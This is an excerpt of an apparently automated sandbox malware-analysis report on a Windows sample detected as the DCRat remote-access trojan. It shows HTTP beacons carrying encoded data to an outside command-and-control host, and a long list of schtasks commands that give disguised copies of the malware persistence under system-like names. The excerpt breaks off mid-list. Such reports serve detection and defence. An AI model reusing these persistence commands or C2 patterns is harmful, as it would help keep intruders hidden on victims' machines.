Jan 5, 2025 19:00:37.390316010 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50046	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:00:42.402553082 CET	2881	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJNTUq9kMRp2T1UkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 19:00:43.120800018 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50047	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:00:48.135102987 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJpXUq9EeJp2T5lkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 19:00:49.004349947 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye
Jan 5, 2025 19:00:49.113384008 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50048	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:00:54.025429964 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJhXUq9EeNp2TzUkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 19:00:54.785201073 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:00:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50049	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 19:00:59.807121038 CET	2905	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJpXVq90MVp2TzUkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEF [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 19:01:00.966114044 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 18:01:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Target ID:	0
Start time:	12:56:57
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\jmBb9uY1B8.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\jmBb9uY1B8.exe"
Imagebase:	0xaf0000
File size:	1'858'048 bytes
MD5 hash:	5D232371C6B04BF6E609EE14FC06F3F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1730523212.0000000003043000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1730523212.000000000302A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1730523212.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1735799473.0000000012EED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 7 /tr "'C:\Windows\twain_32\SgrmBroker.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\Windows\twain_32\SgrmBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\SgrmBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\sihost.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\All Users\sihost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\sihost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 12 /tr "'C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 10 /tr "'C:\Windows\PLA\Templates\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:57:00
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\internet explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 6 /tr "'C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 12 /tr "'C:\Windows\IME\IMETC\HELP\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 10 /tr "'C:\Recovery\MwDxnowBVCiAiIllnkPs.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPs" /sc ONLOGON /tr "'C:\Recovery\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MwDxnowBVCiAiIllnkPsM" /sc MINUTE /mo 14 /tr "'C:\Recovery\MwDxnowBVCiAiIllnkPs.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\jdownloader\StartMenuExperienceHost.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:57:01
Start date:	05/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
